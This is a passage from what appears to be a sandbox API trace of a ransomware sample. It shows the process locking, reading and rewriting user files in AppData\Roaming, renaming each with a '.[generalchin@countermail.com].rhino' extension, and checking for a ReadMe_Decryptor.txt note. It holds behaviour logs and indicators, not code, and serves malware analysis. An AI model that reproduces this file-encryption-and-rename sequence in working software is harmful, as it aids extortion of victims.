returned 1 [0086.440] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x7644a8 [0086.440] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7641d8 | out: hHeap=0x6d0000) returned 1 [0086.440] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x763dc8 [0086.440] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7644a8 | out: hHeap=0x6d0000) returned 1 [0086.442] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x764410 [0086.442] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763dc8 | out: hHeap=0x6d0000) returned 1 [0086.442] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x764d78 [0086.442] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764410 | out: hHeap=0x6d0000) returned 1 [0086.442] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x765b90 [0086.443] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764d78 | out: hHeap=0x6d0000) returned 1 [0086.443] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x7670d0 [0086.443] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x765b90 | out: hHeap=0x6d0000) returned 1 [0086.443] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x769098 [0086.443] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7670d0 | out: hHeap=0x6d0000) returned 1 [0086.443] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x763dc8 [0086.443] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x769098 | out: hHeap=0x6d0000) returned 1 [0086.443] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x73c0b8 [0086.444] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763dc8 | out: hHeap=0x6d0000) returned 1 [0086.444] WriteFile (in: hFile=0xec, lpBuffer=0x73c0c0*, nNumberOfBytesToWrite=0x4cb1, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x73c0c0*, lpNumberOfBytesWritten=0x2cfa04*=0x4cb1, lpOverlapped=0x0) returned 1 [0086.445] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0086.445] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x4cb1, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0086.445] CloseHandle (hObject=0xec) returned 1 [0086.446] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x72a920 [0086.446] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x763b38 [0086.446] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0086.446] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EpNbVP.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\epnbvp.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EpNbVP.avi.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\epnbvp.avi.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0086.448] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763b38 | out: hHeap=0x6d0000) returned 1 [0086.448] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763c40 | out: hHeap=0x6d0000) returned 1 [0086.449] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.449] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x72a920 [0086.449] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0086.449] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0086.449] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75ef78 [0086.449] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0086.449] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.449] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.449] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fGEdHmol-uYJ2aUx41b.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\fgedhmol-uyj2aux41b.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0086.449] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xd896 [0086.450] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xd9b6, nNumberOfBytesToLockHigh=0x0) returned 1 [0086.450] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.450] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0086.451] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.452] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xd896, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xd896, lpOverlapped=0x0) returned 1 [0086.453] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0086.453] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.453] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0086.453] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0086.453] GetLastError () returned 0x0 [0086.453] SetLastError (dwErrCode=0x0) [0086.453] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.453] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd8b9) returned 0x73c0b8 [0086.455] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.455] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x749980 [0086.455] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x749a88 [0086.455] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x749980 | out: hHeap=0x6d0000) returned 1 [0086.455] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.455] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0086.455] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0086.455] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.455] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0086.455] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.455] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0086.455] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.456] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0086.456] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.456] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0086.456] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.456] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0086.456] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0086.456] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0086.456] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0086.456] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0086.456] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0086.456] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0086.456] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0086.456] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0086.456] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.456] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0086.456] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.456] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x749980 [0086.456] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0086.456] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x749c10 [0086.457] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x749980 | out: hHeap=0x6d0000) returned 1 [0086.457] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x749cf0 [0086.457] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x749c10 | out: hHeap=0x6d0000) returned 1 [0086.457] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x749e38 [0086.457] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x749cf0 | out: hHeap=0x6d0000) returned 1 [0086.457] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x74a020 [0086.457] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x749e38 | out: hHeap=0x6d0000) returned 1 [0086.457] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x74a2f0 [0086.457] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74a020 | out: hHeap=0x6d0000) returned 1 [0086.457] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x749c10 [0086.457] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74a2f0 | out: hHeap=0x6d0000) returned 1 [0086.457] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x74a258 [0086.457] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x749c10 | out: hHeap=0x6d0000) returned 1 [0086.457] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x74abc0 [0086.457] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74a258 | out: hHeap=0x6d0000) returned 1 [0086.457] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x75ef78 [0086.457] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74abc0 | out: hHeap=0x6d0000) returned 1 [0086.458] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x749c10 [0086.458] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.458] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x75ef78 [0086.458] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x749c10 | out: hHeap=0x6d0000) returned 1 [0086.458] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x761f10 [0086.458] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.458] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x72bfe8 [0086.459] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761f10 | out: hHeap=0x6d0000) returned 1 [0086.459] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x75ef78 [0086.459] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0086.460] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x72bfe8 [0086.460] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.460] WriteFile (in: hFile=0xec, lpBuffer=0x72c000*, nNumberOfBytesToWrite=0xd9b6, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x72c000*, lpNumberOfBytesWritten=0x2cfa04*=0xd9b6, lpOverlapped=0x0) returned 1 [0086.461] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0086.461] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xd9b6, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0086.461] CloseHandle (hObject=0xec) returned 1 [0086.462] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x749980 [0086.463] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0086.463] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x749980 | out: hHeap=0x6d0000) returned 1 [0086.463] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fGEdHmol-uYJ2aUx41b.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\fgedhmol-uyj2aux41b.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fGEdHmol-uYJ2aUx41b.m4a.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\fgedhmol-uyj2aux41b.m4a.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0086.464] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0086.464] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x749a88 | out: hHeap=0x6d0000) returned 1 [0086.464] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0086.464] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0086.464] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0086.464] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x72a920 [0086.464] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75ef78 [0086.464] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0086.464] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.464] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.464] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fYBJOahURakxC3vfUFg.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\fybjoahurakxc3vfufg.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0086.464] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x6c35 [0086.465] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x6d55, nNumberOfBytesToLockHigh=0x0) returned 1 [0086.465] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.465] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0086.466] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.467] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x6c35, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x6c35, lpOverlapped=0x0) returned 1 [0086.467] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0086.467] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.467] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0086.467] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0086.468] GetLastError () returned 0x0 [0086.468] SetLastError (dwErrCode=0x0) [0086.468] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.468] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6c58) returned 0x75ef78 [0086.468] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.468] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x765bd8 [0086.468] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x765ce0 [0086.468] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x765bd8 | out: hHeap=0x6d0000) returned 1 [0086.468] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.468] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0086.468] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0086.468] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.468] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0086.468] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.468] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0086.468] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.468] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0086.469] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.469] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0086.469] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.469] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0086.469] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0086.469] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0086.469] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0086.469] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0086.469] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0086.469] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0086.469] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0086.469] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0086.469] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.469] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x72a920 [0086.469] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.469] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x765bd8 [0086.469] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0086.469] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x765e68 [0086.473] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x6d55, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0086.473] CloseHandle (hObject=0xec) returned 1 [0086.473] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0086.524] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0086.524] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fYBJOahURakxC3vfUFg.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\fybjoahurakxc3vfufg.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fYBJOahURakxC3vfUFg.swf.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\fybjoahurakxc3vfufg.swf.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0086.528] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x55c6, nNumberOfBytesToLockHigh=0x0) returned 1 [0086.529] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.529] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0086.530] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.530] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x54a6, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x54a6, lpOverlapped=0x0) returned 1 [0086.531] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0086.531] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.531] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0086.531] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0086.531] GetLastError () returned 0x0 [0086.531] SetLastError (dwErrCode=0x0) [0086.531] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.531] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x54c9) returned 0x75ef78 [0086.531] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.531] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x764450 [0086.531] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x764558 [0086.531] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764450 | out: hHeap=0x6d0000) returned 1 [0086.531] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.531] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0086.531] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0086.531] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.531] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0086.531] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.532] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0086.532] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.532] RtlAllocateHeap (HeapHandle=0x6d0000, 